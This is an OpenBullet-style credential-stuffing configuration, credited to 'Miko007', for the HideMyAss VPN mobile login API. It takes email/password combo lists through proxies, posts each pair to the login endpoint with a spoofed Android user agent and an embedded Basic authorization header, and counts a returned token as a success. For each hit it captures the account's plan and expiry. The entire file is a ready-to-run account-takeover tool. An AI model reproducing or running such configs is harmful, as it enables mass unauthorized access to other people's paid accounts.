[SETTINGS]
{
  "Name": "Hidemyass.com",
  "SuggestedBots": 30,
  "LastModified": "2019-04-25T00:55:32.8051329+03:00",
  "AdditionalInfo": "Token-VGhpcyB3YXMgZG9uZSBieSBjb25maWcgbWlrbzAwNy4= - Configservice.club",
  "Author": "Miko007",
  "Version": "1.0.0",
  "IgnoreResponseErrors": false,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "UserPass",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#Login_Post REQUEST POST "https://mobile.api.hmageo.com/clapi/v1.5/user/login" 
  CONTENT "username=<USER>&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Dalvik/2.1.0 (Linux; U; Android 7.0; SM-G950F Build/NRD90M)" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "Authorization: Basic bW9iaXNvbDExMTE6a1pERVk2enMzZA==" 
KEYCHECK 
  KEYCHAIN Success OR 
    KEY "token" 
  KEYCHAIN Failure OR 
    KEY "<SOURCE>" DoesNotContain "token" 
#PARSE1 PARSE "<SOURCE>" JSON "plan" -> CAP "Plan" 
#PARSE2 PARSE "<SOURCE>" JSON "expires" -> CAP "Expires" 
